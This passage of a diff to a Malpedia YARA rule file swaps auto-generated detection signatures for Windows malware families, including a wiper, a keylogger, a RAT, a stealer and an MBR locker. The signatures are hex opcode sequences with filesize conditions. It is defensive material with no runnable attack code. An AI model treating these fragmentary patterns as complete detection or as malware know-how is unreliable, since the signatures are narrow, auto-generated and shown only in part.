+rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b675ae58-304b-51cc-82c9-2d05a952daf3"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkpink_auto.yar#L1-L116"
+		id = "7c9ba4ef-4fa1-51f0-9221-ba77db229e60"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bruh_wiper_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "ae61fd7de2751bb38bc52ea4bef7ef6d5cc9562894ba78123146d52f1f8217ba"
+		logic_hash = "cbaff4d5b7b91bf6e756e6a62487e97a100f6bd9c2c8d699efaa34252266d183"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8579010000 8b35???????? 68a6000000 68???????? 6a01 50 }
-		$sequence_1 = { ffd3 85c0 7530 6a32 }
-		$sequence_2 = { c1f806 6bc938 8b0485f09d4100 0fb6440828 83e040 5d }
-		$sequence_3 = { c745e4a8604100 eb07 c745e494604100 8b4508 }
-		$sequence_4 = { 8b04bdf09d4100 ff743018 ff15???????? 85c0 7404 }
-		$sequence_5 = { 56 57 e8???????? 57 68???????? 53 }
-		$sequence_6 = { 85f6 7420 6bc618 57 8db8f09b4100 }
-		$sequence_7 = { 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
-		$sequence_8 = { 83e73f c1f906 6bd738 8b0c8df09d4100 c644112800 }
-		$sequence_9 = { 8bcf 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
+		$sequence_0 = { 6a03 6800000040 68???????? ff15???????? 8b1d???????? 8bf8 6a00 }
+		$sequence_1 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 8d85f8fdffff }
+		$sequence_2 = { ffd3 83ee01 75e3 8b4dfc 5f 5e }
+		$sequence_3 = { ffd7 8d45f0 50 6a06 6a00 6a00 6a00 }
+		$sequence_4 = { 66a1???????? 668945f4 a0???????? 56 8845f6 8d45f4 57 }
+		$sequence_5 = { 57 ffd3 83ee01 75e3 8b4dfc 5f }
+		$sequence_6 = { 50 6a00 6a01 6a13 ffd7 8d45f0 }
+		$sequence_7 = { 57 ffd3 6800020000 8d85fcfdffff 6a00 50 e8???????? }
+		$sequence_8 = { 83ec10 a1???????? 33c5 8945fc 66a1???????? 668945f4 }
+		$sequence_9 = { 57 ffd3 83ee01 75e3 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
+rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c3c6fac-b35f-5f08-8ac2-d022904e5031"
+		id = "a67b64ba-3a24-5b03-97bb-6fa1fd617831"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sienna_purple_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ddkeylogger_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "8adbc4e03be709562af32b6e6ccf0666aff8c85f72382f2d72c386abf2d917ba"
+		logic_hash = "35bb77ee32a1ee4cf41a3e8133dabb1263e352712bd1dfe36cdbb7e1ce08650b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139573,32 +139298,32 @@ rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c645fc05 e9???????? 83ff11 0f85b6000000 6a74 8d8560ffffff }
-		$sequence_1 = { 8955f8 894514 3b45dc 0f8c41ffffff 5f 5e 5b }
-		$sequence_2 = { 8d86d4000000 50 8d86fc000000 50 8d45dc 50 e8???????? }
-		$sequence_3 = { 8d4ddc e9???????? 8d4dc8 e9???????? 8d8d28ffffff e9???????? 8d8d14ffffff }
-		$sequence_4 = { 99 0bfe f7fb c1e708 0fb60c0a 8d4201 99 }
-		$sequence_5 = { e8???????? 8bf0 83c410 85f6 0f858b050000 c785b8ebffffe05e4300 eb24 }
-		$sequence_6 = { 8d8d98fdffff f7d8 1bc0 05b1040000 50 e8???????? 8d45d4 }
-		$sequence_7 = { e8???????? 83c40c 85c0 0f85fa000000 50 8d45c8 50 }
-		$sequence_8 = { e8???????? e9???????? 0f57c0 c745e800000000 8d4dd0 660fd645e0 f30f7f45d0 }
-		$sequence_9 = { e8???????? 8b8d74feffff 8d855cffffff 53 50 e8???????? 8d85dcfeffff }
+		$sequence_0 = { 88140e 0fb611 feca 88140f 83c102 48 }
+		$sequence_1 = { c1eb06 03de 0fb61493 885102 }
+		$sequence_2 = { 0fb7f1 57 bfffff0000 c745f400000000 }
+		$sequence_3 = { 83c418 8d8de7faffff c745fcffffffff e8???????? 85f6 0f8f14feffff 8b85e0faffff }
+		$sequence_4 = { 8bce eb99 53 8b1d???????? 6a00 ffd3 }
+		$sequence_5 = { 83c8ff e9???????? 8bc6 c1f805 8bfe 53 8d1c8580ee4500 }
+		$sequence_6 = { 83f801 8bc7 7508 8a4c0bff 884c3bff c6043b00 5f }
+		$sequence_7 = { c1fa05 8b149580ee4500 c1e006 8d440224 }
+		$sequence_8 = { 7448 f7c200f00000 7420 f7c200c00000 740c f7c200800000 0f95c0 }
+		$sequence_9 = { 56 ff15???????? 56 8bf8 ff15???????? 3b3d???????? }
 
 	condition:
-		7 of them and filesize < 2930688
+		7 of them and filesize < 808960
 }
-rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
+rule MALPEDIA_Win_Karagany_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d89ff0c-708d-5cb2-bdc2-6969544672dc"
+		id = "3572ccbc-1c3c-5c06-9653-09cc26e9f425"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mars_stealer_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karagany_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "cc94c9b32aabf5299f34d05641ffdf1640d29fa168f4cb92b657b3f5122a585c"
+		logic_hash = "7b1e13963414e6b2e1af9eb1a6f96423af34e9bc7a849bda8fce35a0e1356973"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139612,32 +139337,32 @@ rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 8945fc 837dfc00 744c 6a00 }
-		$sequence_1 = { e8???????? 83c404 85c0 7443 833d????????00 751e }
-		$sequence_2 = { 0f90c1 f7d9 0bc8 51 ff15???????? 83c404 8945f4 }
-		$sequence_3 = { 8985fcfdffff c745fcc0270900 6a04 8d45fc 50 6a02 }
-		$sequence_4 = { 51 e8???????? c78548fcffff94000000 8d9548fcffff }
-		$sequence_5 = { 8bec 81ecc8040000 56 57 c78548fcffff00000000 6890000000 6a00 }
-		$sequence_6 = { 8d85e8d7ffff 50 e8???????? 6888130000 8d8d78ecffff }
-		$sequence_7 = { 8b55f0 52 ff15???????? 83c404 8b45e8 }
-		$sequence_8 = { 8d8d78ecffff 51 e8???????? 8d95e4d7ffff 52 8d85e0d7ffff 50 }
-		$sequence_9 = { 50 ff15???????? 83c404 8985dcf7ffff 8b85dcf7ffff }
+		$sequence_0 = { 8945d0 8945d8 8945e0 8945e8 8945ec 8945f4 }
+		$sequence_1 = { 8bf8 6a03 57 ffd6 }
+		$sequence_2 = { 57 8bf8 6a03 57 }
+		$sequence_3 = { 8945d8 8945e0 8945e8 8945ec 8945f4 }
+		$sequence_4 = { 6a40 6800300000 6800000300 6a00 }
+		$sequence_5 = { 8b4508 0526f8ffff 69c06c010000 034510 }
+		$sequence_6 = { 8bec 81ec60060000 53 56 57 33c0 }
+		$sequence_7 = { ff15???????? 6a00 53 68???????? }
+		$sequence_8 = { 68???????? 8d85a4fdffff 50 ffd6 68???????? }
+		$sequence_9 = { 8bd8 2bc7 40 50 57 }
 
 	condition:
-		7 of them and filesize < 219136
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_No_Justice_Auto : FILE
+rule MALPEDIA_Win_Anchormtea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b7b9773-a26f-59ba-b88a-0b2ca96e9a3c"
+		id = "32582435-d23f-5bf2-99b8-f6c7ec2febef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.no_justice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.no_justice_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anchormtea_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "8d1e9903aebd9a1a139d570c6e8c7d10c9b765f1e0f83bd5a67cde88d712e8e8"
+		logic_hash = "0d56b6ebc1869a5136446b1b05f633dc23ded4ac41169656ca6cd600d19c6d7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139651,32 +139376,37 @@ rule MALPEDIA_Win_No_Justice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7720 0fb680ac5c4000 ff2485985c4000 33c0 40 5d }
-		$sequence_1 = { 8a0a 884c382e 8b45bc 8b048570be4100 804c382d04 }
-		$sequence_2 = { 0f84e8000000 8b04952c6b4100 898588f8ffff 85c0 0f84ad000000 3bc3 0f84cb000000 }
-		$sequence_3 = { e8???????? c9 c3 c705????????08b14100 b001 }
-		$sequence_4 = { c1e002 50 8b85a8f8ffff 0fb70485946a4100 8d048590614100 50 8d8590faffff }
-		$sequence_5 = { 8b148d70be4100 0355b0 8a0c03 03d3 43 }
-		$sequence_6 = { c745e003000000 c745e4508e4100 e9???????? 83e80f }
-		$sequence_7 = { 57 e8???????? 59 59 e9???????? 8b049570be4100 f644082840 }
-		$sequence_8 = { f7d0 a801 74a5 8b55ec 33f6 8b049570be4100 }
-		$sequence_9 = { 0f8414020000 eb4f 0fb602 0fbe8860b74100 41 894db4 3bcf }
+		$sequence_0 = { e9???????? f7d8 1bc0 83e002 }
+		$sequence_1 = { 4883f81f 0f87fd170000 488bce e8???????? 4c8d8b44010000 4c8d05255f0200 }
+		$sequence_2 = { 898d68f7ffff 89b564f7ffff 3bd0 7741 }
+		$sequence_3 = { 8bc2 c1e81f 03c2 8945fc b8619e426b f7e9 }
+		$sequence_4 = { 4533c0 48c7c100000080 897c2420 ff15???????? 85c0 7563 }
+		$sequence_5 = { 89442450 8b45dc 89542448 418bd2 }
+		$sequence_6 = { 8bd9 4c8d0d69cc0000 b904000000 4c8d0555cc0000 488d15c6af0000 e8???????? }
+		$sequence_7 = { 6800010000 ff761c e8???????? ff75e0 668b45cc 6824080000 }
+		$sequence_8 = { 4585ff 0f84d3000000 33ff 4d63e7 }
+		$sequence_9 = { 83c414 c744241000000000 57 ff15???????? }
+		$sequence_10 = { ff15???????? 488bf8 4885c0 7410 33d2 }
+		$sequence_11 = { 55 8bec 81ec8c030000 a1???????? 33c5 8945fc ff05???????? }
+		$sequence_12 = { c7471c40300010 894714 c7472060300010 c7472480300010 c7472890300010 c7472cb0300010 }
+		$sequence_13 = { 51 e8???????? 83c408 8bb70c010000 89b568f7ffff 85f6 0f846c010000 }
+		$sequence_14 = { 4c897e10 4903c5 488bcb 4c8d3c12 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 839680
 }
-rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
+rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2024fcd8-73ff-5d21-84a0-faeb93ed391a"
+		id = "d86d59ae-6efa-5db2-8e1b-5b4757eca710"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimbo_c2_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.innaput_rat_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "6b113df7136733641a874652387013b524eae7ec4a37b82db2a8e2b046f0820e"
+		logic_hash = "9400019d5ff97dc8155c2ec12b684baeeb0d9d8ecccb4529f4b2a8b8f06ad889"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139690,32 +139420,32 @@ rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7411 488b09 ba02000000 e8???????? c6430800 4883c420 5b }
-		$sequence_1 = { 48c7c0fcffffff 4885d2 7407 488b02 4883e804 488d4c0210 ba04000000 }
-		$sequence_2 = { 498d8c24b0000000 4889c2 e8???????? 4c89e0 41c68424b800000001 4883c420 }
-		$sequence_3 = { 4819db 4889c1 488985c0feffff e8???????? 83e313 488d8df8feffff 4881c306000200 }
-		$sequence_4 = { e8???????? 90 4883c438 c3 488b05???????? 48ff20 488b05???????? }
-		$sequence_5 = { 7f1c 488b8df8fbffff e8???????? 4889f2 4989c7 4885c0 7432 }
-		$sequence_6 = { 6605bb01 488b4c2450 0fb7d0 41b901000000 41b806000000 e8???????? 4889d9 }
-		$sequence_7 = { 4889c6 4d85f6 740d 4889fa 4c89f1 e8???????? eb07 }
-		$sequence_8 = { 4889c2 eb28 4d8d46ff 4c89e1 e8???????? 4c89f9 4889c2 }
-		$sequence_9 = { 57 56 53 4883ec20 488bb42488000000 4c8b32 4889f5 }
+		$sequence_0 = { ffb720060000 8d8f1c060000 51 ffb718060000 }
+		$sequence_1 = { 85c0 7427 ffb720060000 8d8f1c060000 51 }
+		$sequence_2 = { 8bf8 33c0 893b ab }
+		$sequence_3 = { ff15???????? ffb718060000 ff15???????? 85c0 750c ffb71c060000 ff15???????? }
+		$sequence_4 = { ff15???????? 85c0 750c ffb71c060000 ff15???????? 57 e8???????? }
+		$sequence_5 = { 59 8bc6 3bf3 75ed }
+		$sequence_6 = { 751b 53 53 53 }
+		$sequence_7 = { ff15???????? 85c0 750c ffb71c060000 ff15???????? }
+		$sequence_8 = { 85c0 7413 3bc6 740f 8b4d08 e8???????? 3b450c }
+		$sequence_9 = { 2bf1 8a08 884c0616 40 84c9 75f5 }
 
 	condition:
-		7 of them and filesize < 1141760
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Badencript_Auto : FILE
+rule MALPEDIA_Win_Victorygate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ddb7f1a7-8259-5ec8-9b35-e98fb67b2310"
+		id = "ad2b94f4-4fb4-597c-a815-1680fdce8561"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badencript_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.victorygate_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4aaa48768d97770f6e85ee594f356b88c6dabd160111a6a927596e69e9ca03f4"
+		logic_hash = "f881de762583581b8f9cd5a6d8f43db0e0fda7800670c3d8d7443132f914f29e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139729,32 +139459,32 @@ rule MALPEDIA_Win_Badencript_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 23c1 eb55 8b1c9d68d14000 56 6800080000 }
-		$sequence_1 = { 8b0c8d48414100 c644112800 85f6 740c }
-		$sequence_2 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 }
-		$sequence_3 = { 57 8d1c85383d4100 33c0 f00fb10b 8b15???????? 83cfff }
-		$sequence_4 = { 7451 83e809 7443 83e801 0f8501010000 c745e0a40f4100 }
-		$sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 7413 }
-		$sequence_6 = { c1fa06 6bc830 8b049548414100 f644082801 7414 8d4508 8945fc }
-		$sequence_7 = { 6bc830 8b049548414100 f644082801 7421 57 e8???????? }
-		$sequence_8 = { 83e03f c1fa06 6bc830 8b049548414100 f644082801 7414 }
-		$sequence_9 = { 7313 8a8750304100 08441619 42 }
+		$sequence_0 = { e8???????? 8bd0 c645fc08 8d8d68ffffff e8???????? c645fc07 }
+		$sequence_1 = { ff75f8 8d8684010000 6a45 50 ff15???????? 85c0 }
+		$sequence_2 = { c645dc00 33d2 660fd645e4 8d4ddc e8???????? 68???????? 8d4dc4 }
+		$sequence_3 = { ff36 8bcf 50 e8???????? 8b4e08 83c334 83c634 }
+		$sequence_4 = { 8d4dc4 c645fc10 e8???????? 0fb64ddc 8bf8 8b45e4 8a17 }
+		$sequence_5 = { 56 682a2b0000 ffd0 85c0 7419 50 e8???????? }
+		$sequence_6 = { 50 ff7120 ff7128 e8???????? 83c410 85c0 7415 }
+		$sequence_7 = { 8b45f0 8d0c90 8b01 85c0 740d 395804 7408 }
+		$sequence_8 = { e8???????? 68???????? 8d4dc4 c645fc07 e8???????? 0fb64ddc 8bf8 }
+		$sequence_9 = { 668908 8bcf c7401000000000 c7401407000000 8d45b0 50 660fd645c0 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 1209344
 }
-rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
+rule MALPEDIA_Win_Hermes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "58de5ec4-0318-51d8-b594-608e74c6b19b"
+		id = "40977080-f0db-509f-ad36-9106e881ac17"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_adspace_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermes_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "a92489c81a6d8e641c169a9deed543e2e8352f876cddeafa8d67d22e27f031a4"
+		logic_hash = "ec38569492fc62621d2bfb5ebe2db77f57521b3e9d7ddcf1c5d737c6a9cf9c68"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139768,32 +139498,32 @@ rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8d7c241d c744241400010000 f3ab }
-		$sequence_1 = { e8???????? 8b4c2420 2bc7 03c1 50 89442424 }
-		$sequence_2 = { e8???????? 8365fc00 57 56 8d4dec }
-		$sequence_3 = { 50 ff15???????? ff742410 e8???????? 56 e8???????? 55 }
-		$sequence_4 = { 50 89442438 e8???????? ff742438 ff15???????? 69c060ea0000 83c42c }
-		$sequence_5 = { 85c0 7408 c744241001000000 bf???????? }
-		$sequence_6 = { 83c40c 8bf8 8d45fc 50 a1???????? 40 50 }
-		$sequence_7 = { b8???????? e8???????? 81ec08010000 53 56 8b1d???????? 57 }
-		$sequence_8 = { ffd6 b8???????? 5e 5b c9 }
-		$sequence_9 = { 83c418 8d85ecfeffff 68???????? 50 ff15???????? 85c0 a3???????? }
+		$sequence_0 = { 33d2 6a79 59 f7f1 }
+		$sequence_1 = { 6a01 6810660000 ff75fc ff15???????? }
+		$sequence_2 = { 50 8b4508 83c801 50 }
+		$sequence_3 = { 83c801 50 6a01 ff75fc }
+		$sequence_4 = { 7508 6a01 ff15???????? 8be5 5d c3 }
+		$sequence_5 = { 7508 6a01 ff15???????? 8be5 5d }
+		$sequence_6 = { 6a04 6800100000 6888130000 6a00 ff15???????? }
+		$sequence_7 = { 83c801 50 6a01 ff75fc ff15???????? }
+		$sequence_8 = { 50 6a01 6810660000 ff75fc ff15???????? }
+		$sequence_9 = { 7508 6a01 ff15???????? 8d45fc }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 7192576
 }
-rule MALPEDIA_Win_Cloudwizard_Auto : FILE
+rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "abbdc257-eb7b-5dbc-b89d-fa521addbb7b"
+		id = "47ea5615-8136-5cb4-9bef-7286571c39f9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudwizard_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bundestrojaner_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "73a241c1b717ddfac0eb8392f69e9bf260621defdb3bc053842ea74bc39dad65"
+		logic_hash = "fd1e7fa09fb34d70736eb8553b933219d912c7ea6e3c9d3818f4d8762292bdc7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139807,34 +139537,34 @@ rule MALPEDIA_Win_Cloudwizard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4802 668b38 40 40 6685ff }
-		$sequence_1 = { d1f8 51 8d844618060000 50 e8???????? bf???????? 8bc7 }
-		$sequence_2 = { 57 50 e8???????? 8d4570 83c40c }
-		$sequence_3 = { 8bc6 8975ec e8???????? ff750c 8b06 ff7508 8bce }
-		$sequence_4 = { 6a5a 58 6a5d 66894544 }
-		$sequence_5 = { 58 6a44 668945a8 58 6a1b }
-		$sequence_6 = { 8986fc010000 897e70 c686c800000043 c6864b01000043 c7466838d54000 }
-		$sequence_7 = { 58 6a49 668945e4 58 668945e6 6a5d 58 }
-		$sequence_8 = { c645cf4a c645d044 c645d14d c645d27f 885dd3 8d45bc 59 }
-		$sequence_9 = { 8bce ff5010 6a04 33d2 59 }
+		$sequence_0 = { 85c0 7e15 8bc5 2bdd d90403 d800 41 }
+		$sequence_1 = { 3bca 7e5a 8b4e10 85c9 7443 c1f803 8d542801 }
+		$sequence_2 = { 33d5 89a8c4000000 33f2 89542418 8990c8000000 8bd6 }
+		$sequence_3 = { 895610 89560c 895614 7415 8b44240c 3bc2 740d }
+		$sequence_4 = { 8b7e1b 8ac8 80e902 f6d9 1bc9 2c02 83e102 }
+		$sequence_5 = { 740f 6a00 6a00 6a27 8bc8 e8???????? eb02 }
+		$sequence_6 = { 8b44243c c68424c800000002 8b4830 51 8bce e8???????? }
+		$sequence_7 = { 8bcf 8b442418 8d1476 896c2460 f7d9 8bac2430010000 83e103 }
+		$sequence_8 = { 50 8986b4000000 e8???????? 83c420 b802000000 89bec0000000 89bec4000000 }
+		$sequence_9 = { 50 e8???????? 8b4c2410 8b542408 51 50 }
 
 	condition:
-		7 of them and filesize < 134144
+		7 of them and filesize < 729088
 }
-rule MALPEDIA_Win_Warmcookie_Auto : FILE
+rule MALPEDIA_Win_Mbrlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0026322f-2256-5880-b6f0-ee27db7c6e54"
+		id = "278f7834-90b2-5397-9ece-a797760d8d62"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warmcookie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warmcookie_auto.yar#L1-L234"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mbrlock_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "f9b50e12d5d001e33fbadd9cf4f5cbc2e73544c65bdcaaf5cab4e22fb22bdceb"
+		logic_hash = "f922ef8df18c5fa1824f3d97da8882716cabf76bff393f438d1827b2c64b4a0e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139846,47 +139576,32 @@ rule MALPEDIA_Win_Warmcookie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41b900000000 41b807000000 ba00000080 4889c1 }
-		$sequence_1 = { 48c744243800000000 c744243000000000 c744242803000000 48c744242000000000 41b900000000 }
-		$sequence_2 = { 41be01000000 4d85d2 0f8489010000 418b02 85c0 0f88c0060000 8d0480 }
-		$sequence_3 = { 4183fe03 0f87ff050000 4585f6 0f850a020000 41be01000000 4d85d2 }
-		$sequence_4 = { 41b902000000 41b800000000 ba00000000 4889c1 }
-		$sequence_5 = { 48896c2470 8944242c 48b8fffffffffdffffff 4889842480000000 31c0 6689842488000000 }
-		$sequence_6 = { 448b44244c 4989c4 4181f80080ffff 7470 }
-		$sequence_7 = { 4883c468 5b 415c c3 55 }
-		$sequence_8 = { 4181f80080ffff 7470 8b4c2448 4889c2 4989d9 e8???????? }
-		$sequence_9 = { 8b530c 85d2 0f8e1bffffff 01d0 89430c e9???????? 4157 }
-		$sequence_10 = { 4883ec28 e8???????? 3dff2f0000 0f97c0 }
-		$sequence_11 = { ba19000000 488b4c2438 ff15???????? 85c0 }
-		$sequence_12 = { ba18000000 4889c1 ffd3 85c0 }
-		$sequence_13 = { 85c0 7409 488b442428 48c1e814 }
-		$sequence_14 = { 488b01 ff9080000000 85c0 7815 }
-		$sequence_15 = { ff15???????? 25ff0f0000 8d88b80b0000 ff15???????? }
-		$sequence_16 = { 488b01 ff5010 ff15???????? 89f0 4883c458 }
-		$sequence_17 = { 8d8800040000 e8???????? 4889c3 4885c0 }
-		$sequence_18 = { 0fb6d1 488b0b ff15???????? 8b38 488bcb e8???????? 488b4c2448 }
-		$sequence_19 = { 85c0 7432 488d0c7d02000000 e8???????? 488bd8 4885c0 }
-		$sequence_20 = { 48ffc7 66393478 75f7 4885ff 740d 488d4c2420 }
-		$sequence_21 = { 440fb64101 410fb6540902 410fb6440802 4188440902 4188540802 0fb601 }
-		$sequence_22 = { 488bce e8???????? 488b7c2468 8bc3 }
-		$sequence_23 = { 4c8bc6 6683f822 744f 48ffc1 664289440420 }
-		$sequence_24 = { 488d542470 b901010000 ff15???????? 85c0 }
+		$sequence_0 = { 663d0500 7445 668bce 668bd0 66c1e90a 66c1ea0a }
+		$sequence_1 = { 8965f0 8b4708 8975ec 85c0 c745fc00000000 7422 50 }
+		$sequence_2 = { e8???????? 8d4d8c c745fcffffffff e8???????? b801000000 8b4df4 64890d00000000 }
+		$sequence_3 = { 6685d2 740c 33c9 663bf0 0f94c1 }
+		$sequence_4 = { 85f6 7407 8d4608 85c0 7517 8d442410 }
